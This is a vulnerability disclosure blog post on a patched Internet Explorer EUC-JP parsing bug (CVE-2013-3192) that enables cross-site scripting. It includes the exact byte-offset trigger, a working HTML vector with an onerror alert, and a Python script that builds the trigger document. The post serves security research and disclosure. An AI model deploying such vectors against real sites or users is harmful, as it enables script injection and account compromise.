Friday, August 16, 2013

UXSS – Internet Explorer EUC-JP Parsing Bug

While I was using shazzer, one vector had a really weird result. The vector was:

<img src=x *chr*> onerror=alert(1)>

The result said that in Internet Explorer 10 a certain character in the EUC-JP charset consumed the >, which led to the execution of the onerror event handler, but viewing the test case resulted in no code execution. After retesting the vector there were either no results or different characters got detected, but still no test case worked. I assumed that shazzer worked correctly, but that certain parameters were different between "show test case" and the real fuzzing process.

After creating a little fuzzing script, I finally found out that a certain number of bytes has to come before the starter byte 0x8F (in EUC-JP, 0x8F is the single-shift byte SS3 that introduces a three-byte JIS X 0212 character). The document has to look like this (charset must be EUC-JP):

4094 bytes + 0x8F + characters that "disappear"

(4094 + 1 = 0xFFF: a three-byte sequence starting at that offset straddles a 0x1000-byte boundary, which points to a buffer-boundary bug in the decoder.)

Once I knew how to trigger the bug, I found out that not only > gets consumed; it seems like every character gets consumed. This is especially useful for consuming the ". A vector could look like this:

[4076*A]<img src="x" alt="[0x8F]" test="
onerror=alert(1)//">

The 4076 bytes of padding plus the 18 bytes of <img src="x" alt=" put the 0x8F at offset 4094. Because the " after the 0x8F will be consumed, the alt value runs on until the " that was meant to open the test attribute, and onerror=alert(1)//" becomes an attribute of the img element; the // turns the stray closing " into a JavaScript comment, so the onerror event will execute.

This parsing bug enables XSS on websites that use the EUC-JP charset against Internet Explorer users even when the site has no XSS vulnerability: as the vector shows, the attacker only needs to control the text inside two quoted attribute values of the same element (0x8F at the end of the first, the handler in the second), and neither value contains a quote or an angle bracket that server-side output encoding would catch.
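As an added example (not the author's fuzzing script, and not Internet Explorer's code), the following Python builds the EUC-JP test document with the 0x8F byte at the offset given above and then contrasts two decodings: a conforming one (Python's own euc_jp codec, which turns the lone 0x8F into U+FFFD and keeps the following quote) and a model of the behaviour described in the post (the assumption being that the bug fires only when 0x8F sits exactly at byte offset 4094, and that it eats the byte after the 0x8F). Feeding both results to an HTML parser shows that onerror only becomes an attribute in the buggy case, and the offset parameter shows that an off-by-one placement does nothing under that model. The hypothetical `test` attribute name and the padding byte are taken from the post's vector.

```python
"""Build the EUC-JP trigger document from the post and show, on the decoder
side, why the swallowed quote matters.  Added example; the "buggy" decoder is
a model of the behaviour described in the post, not real IE internals."""
from html.parser import HTMLParser

SS3 = b"\x8f"           # EUC-JP single shift 3: lead byte of a 3-byte JIS X 0212 character
TRIGGER_OFFSET = 4094   # from the post: 4094 bytes, then 0x8F (4094 + 1 = 0xFFF)

# The two attacker-controlled attribute values from the post's vector; neither
# contains '"', '<' or '>', so output encoding on the server would pass them.
FIRST_VALUE = SS3
SECOND_VALUE = b"\nonerror=alert(1)//"


def build_vector(offset=TRIGGER_OFFSET, pad_byte=b"A"):
    """Return the EUC-JP document with the SS3 byte at byte index `offset`.

    The padding length is derived from the offset: the post's 4076 'A's are
    simply 4094 minus the 18-byte prefix '<img src="x" alt="'.
    """
    prefix = b'<img src="x" alt="'
    pad_len = offset - len(prefix)
    if pad_len < 0:
        raise ValueError("offset too small for the prefix")
    doc = pad_byte * pad_len + prefix + FIRST_VALUE + b'" test="' + SECOND_VALUE + b'">'
    assert doc.index(SS3) == offset  # sanity check on the byte layout
    return doc


def decode_conforming(doc):
    """What a conforming EUC-JP decoder produces.

    0x8F followed by ASCII is not a valid JIS X 0212 sequence, so the lone
    0x8F is replaced (U+FFFD) and the following '"' survives.
    """
    return doc.decode("euc_jp", errors="replace")


def decode_like_buggy_ie(doc, swallowed=1):
    """Model of the post's description (assumption): when 0x8F sits exactly at
    TRIGGER_OFFSET, it disappears together with `swallowed` following byte(s).
    Anywhere else the document decodes normally."""
    i = doc.find(SS3)
    if i != TRIGGER_OFFSET:
        return decode_conforming(doc)
    return decode_conforming(doc[:i] + doc[i + 1 + swallowed:])


class _ImgAttrs(HTMLParser):
    """Collect the attributes of the first <img> start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "img" and self.attrs is None:
            self.attrs = dict(attrs)


def img_attributes(html):
    """Return {name: value} for the first <img> in `html` ({} if none)."""
    p = _ImgAttrs()
    p.feed(html)
    p.close()
    return p.attrs or {}


if __name__ == "__main__":
    doc = build_vector()
    print("conforming :", img_attributes(decode_conforming(doc)))
    print("buggy model:", img_attributes(decode_like_buggy_ie(doc)))
    print("off by one :", img_attributes(decode_like_buggy_ie(build_vector(offset=4093))))
```

Under the conforming decode the element carries src, alt and a harmless test attribute whose value is the whole second string; under the buggy model the alt value swallows ` test=` and the parser sees an unquoted onerror attribute with value `alert(1)//"`, the trailing quote being dead JavaScript behind the `//`.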
Reported: 27.5.2013
Fixed: 14.8.2013
CVE-2013-3192